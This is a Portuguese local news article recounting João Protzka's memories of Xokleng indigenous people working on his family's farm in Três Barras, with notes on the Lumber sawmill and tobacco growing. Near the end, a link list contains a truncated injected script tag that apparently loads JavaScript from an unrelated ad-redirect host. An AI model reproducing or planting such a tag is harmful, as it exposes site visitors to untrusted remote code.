InícioCuriosidades do PassadoÍndios Xokleng conviviam com moradores, trabalhando na lavoura, em Três Barras

Índios Xokleng conviviam com moradores, trabalhando na lavoura, em Três Barras

Últimas notícias

Operação contra abuso sexual em Canoinhas e Papanduva é considerada a maior da região

A operaçãoRespectus, deflagrada nesta quarta-feira (24) em Papanduva e...

Após denúncia polícia militar apreende arma sem registro em Três Barras

Na quarta-feira, 24, por volta das 16h, policiais militares...

 

Para aqueles que acreditam que os índios eram arredios, sem vínculos com o trabalho, o depoimento do tresbarrense João Protzka aponta um novo olhar sobre a questão. Aos 77 anos de idade, ele recorda com detalhes dos índios Xokleng (botocudos, bugres) trabalhando na lavoura de sua família.

 

Índios Xokleng

 

Além do trabalho na lavoura, a família Protzka atuou no transporte de madeiras para a serraria Lumber, maior emprendimento madeireiro da América do Sul, no início do século XX.  João Protzka lembra da Colônia Tigre, localidade interiorana de Três Barras, que atraia clientes com o moinho do Senhor Luís Szczerbowski.

 

Serraria Lumber e Colônia Tigre

 

O cultivo do fumo faz parte da economia tresbarrense. João Protzka relata a experiência da família, destacando o sistema integrado no cultivo do fumo com a Souza Cruz.

 

Cultivo do fumo

 

João Protzka é fonte viva da história. Seus relatos perpassam dos sobreviventes da Guerra do Contestado, ao misticismo de São João Maria, chegando ao início dos trabalhos de terraplanagem da Rigesa. Registrar esses depoimentos é uma forma de preservar a memória histórica tresbarrense (Entrevista completa disponível:

 

 

 

Para saber mais:

Sobre o cultivo do fumo: https://www.youtube.com/watch?v=-1IqZqaGgog

Sobre a serraria Lumber: https://docs.wixstatic.com/ugd/111853_380b0540a754422f9bff710b550329d2.pdf… src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.